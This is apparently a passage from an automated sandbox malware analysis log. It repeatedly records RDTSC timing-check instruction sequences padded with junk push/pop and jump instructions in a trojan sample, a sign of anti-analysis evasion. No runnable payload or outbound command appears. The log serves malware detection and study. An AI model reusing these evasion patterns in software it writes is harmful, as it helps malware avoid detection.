Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6D422 second address: B6D426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B6D426 second address: B6D42A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B74ACE second address: B74AF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FABC90CD766h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B74C5C second address: B74C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FABC9471C3Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FABC9471C2Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B7A52B second address: B7A52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B7A67D second address: B7A683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B7A683 second address: B7A68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B7A68C second address: B7A6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FABC9471C2Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B7A6A3 second address: B7A6A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B7A6A7 second address: B7A6BB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FABC9471C32h 0x0000000c je 00007FABC9471C26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B314C3 second address: B314C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B314C7 second address: B314CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B314CB second address: B314D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B314D6 second address: B31598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jp 00007FABC9471C2Eh 0x0000000d nop 0x0000000e or edi, 5C4A1A31h 0x00000014 mov ebx, dword ptr [ebp+1249556Dh] 0x0000001a jl 00007FABC9471C2Ch 0x00000020 and edi, dword ptr [ebp+122D1FD6h] 0x00000026 add eax, ebx 0x00000028 add edx, dword ptr [ebp+1245AE38h] 0x0000002e nop 0x0000002f jmp 00007FABC9471C31h 0x00000034 push eax 0x00000035 pushad 0x00000036 jg 00007FABC9471C28h 0x0000003c push ebx 0x0000003d push esi 0x0000003e pop esi 0x0000003f pop ebx 0x00000040 popad 0x00000041 nop 0x00000042 push 00000000h 0x00000044 push ebp 0x00000045 call 00007FABC9471C28h 0x0000004a pop ebp 0x0000004b mov dword ptr [esp+04h], ebp 0x0000004f add dword ptr [esp+04h], 00000016h 0x00000057 inc ebp 0x00000058 push ebp 0x00000059 ret 0x0000005a pop ebp 0x0000005b ret 0x0000005c mov dword ptr [ebp+122D1C81h], esi 0x00000062 push 00000004h 0x00000064 jnc 00007FABC9471C2Ah 0x0000006a sub dword ptr [ebp+1245C488h], eax 0x00000070 nop 0x00000071 push ebx 0x00000072 jnc 00007FABC9471C36h 0x00000078 pop ebx 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007FABC9471C38h 0x00000081 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B7EF50 second address: B7EF54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B7EF54 second address: B7EF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC9471C34h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FABC9471C32h 0x00000011 jmp 00007FABC9471C2Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B7F276 second address: B7F29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007FABC90CD761h 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B7F29D second address: B7F2A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B7F2A1 second address: B7F2AB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FABC90CD756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B7F2AB second address: B7F2C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C30h 0x00000009 ja 00007FABC9471C26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B7F3EC second address: B7F404 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FABC90CD756h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FABC90CD75Ch 0x00000012 ja 00007FABC90CD756h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B7F404 second address: B7F42F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FABC9471C30h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FABC9471C33h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B82F41 second address: B82F47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B82F47 second address: B82F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B82F4C second address: B82F65 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 jmp 00007FABC90CD75Ch 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B82F65 second address: B82F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B830F2 second address: B830F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B830F6 second address: B830FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B830FC second address: B83117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD765h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B83553 second address: B83585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FABC9471C35h 0x0000000b popad 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FABC9471C2Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B83585 second address: B83597 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jp 00007FABC90CD756h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B83597 second address: B8359B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B8AD52 second address: B8AD78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD766h 0x00000009 jmp 00007FABC90CD75Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AEF401 second address: AEF412 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AEF412 second address: AEF42A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FABC90CD762h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AEF42A second address: AEF43F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FABC9471C2Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AEF43F second address: AEF463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FABC90CD768h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AEF463 second address: AEF469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AEF469 second address: AEF480 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FABC90CD75Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B88F99 second address: B88F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B88F9D second address: B88FA5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B88FA5 second address: B88FBD instructions: 0x00000000 rdtsc 0x00000002 jo 00007FABC9471C28h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FABC9471C26h 0x00000012 jng 00007FABC9471C26h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B88FBD second address: B88FC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B8A10D second address: B8A12A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FABC9471C32h 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B8A12A second address: B8A137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FABC90CD756h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B8A3FA second address: B8A413 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C34h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B8A6D1 second address: B8A6D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B8F816 second address: B8F81A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B8F81A second address: B8F82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FABC90CD75Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B8F82F second address: B8F86A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FABC9471C34h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FABC9471C32h 0x00000012 jmp 00007FABC9471C2Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B8E99C second address: B8E9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B8E9A2 second address: B8E9AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 js 00007FABC9471C26h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: B9BE09 second address: B9BE45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD769h 0x00000007 jng 00007FABC90CD75Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007FABC90CD75Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 js 00007FABC90CD756h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BA1189 second address: BA118D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BA118D second address: BA1198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BA1198 second address: BA11A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BA11A0 second address: BA11A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BA11A6 second address: BA11CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FABC9471C31h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007FABC9471C2Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BA11CF second address: BA11E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FABC90CD75Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BA453D second address: BA4541 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BA4541 second address: BA4580 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Bh 0x00000007 jmp 00007FABC90CD766h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f jmp 00007FABC90CD762h 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BA4580 second address: BA458A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FABC9471C26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BA458A second address: BA459D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jp 00007FABC90CD756h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BA459D second address: BA45A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BA45A3 second address: BA45AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BA3F97 second address: BA3FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ebx 0x00000007 popad 0x00000008 pushad 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FABC9471C36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BB30D5 second address: BB30F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC90CD766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BB30F1 second address: BB30F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AED8D9 second address: AED8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: AED8DD second address: AED901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FABC9471C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 js 00007FABC9471C34h 0x0000001b push edx 0x0000001c jbe 00007FABC9471C26h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BB4D1F second address: BB4D40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jno 00007FABC90CD756h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 js 00007FABC90CD756h 0x0000001b jnp 00007FABC90CD756h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BB4D40 second address: BB4D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FABC9471C2Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BB4D54 second address: BB4D59 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BB4EA8 second address: BB4EBD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FABC9471C2Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BB4EBD second address: BB4EE2 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FABC90CD756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push ecx 0x0000000d jp 00007FABC90CD756h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FABC90CD75Dh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BB4EE2 second address: BB4EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BC20A4 second address: BC20AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BC20AA second address: BC20C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FABC9471C2Ah 0x0000000f rdtsc
